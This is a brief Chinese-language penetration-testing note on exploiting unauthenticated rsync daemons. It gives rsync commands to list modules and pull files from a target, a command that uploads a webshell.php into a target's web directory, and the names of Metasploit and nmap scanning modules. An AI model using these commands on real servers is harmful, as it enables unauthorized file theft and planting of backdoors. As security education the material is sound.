rsync未授权访问漏洞
一、简介
rsync是Unix下的一款应用软件,能同步更新两处计算机的文件及目录。在同步文件时,可以保持源文件的权限、时间、软硬链接等附加信息。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员;而开发人员安全意识薄弱、安全技能欠缺往往是导致rsync出现相关漏洞的根源。
二、常用技巧
0x00
rsync默认配置文件为/etc/rsyncd.conf,常驻模式启动命令rsync –daemon,启动成功后默认监听于TCP端口873,可通过rsync-daemon及ssh两种方式进行认证。
虽然知道了默认指定的端口,但是还是要用一下nmap扫描一下端口情况,如果默认端口被更改,则需要进行制定端口。
0x01
rsync IP:: //这是在默认条件下没有改变默认的端口,默认密码是::
rsync --port=xxx ip:: //如果修改了默认端口就需要指定端口,这里就是需要自己指定47900端口
rsync -avz ip::www /tmp //-avz是下载文件的命令,前一个是目标内容,后一个是自己指定存储在本地的路径
rsync -avz --port=xxx ip::dddd /tmp
rsync -avz webshell.php ip::/www //-avz同时是上传文件的命令,前面是要上传的文件,后一个是要上传的路径
三、自动化脚本
Metasploit中关于允许匿名访问的rsync扫描模块:auxiliary/scanner/rsync/modules_list
nmap中针对rsync同步目录列举的脚本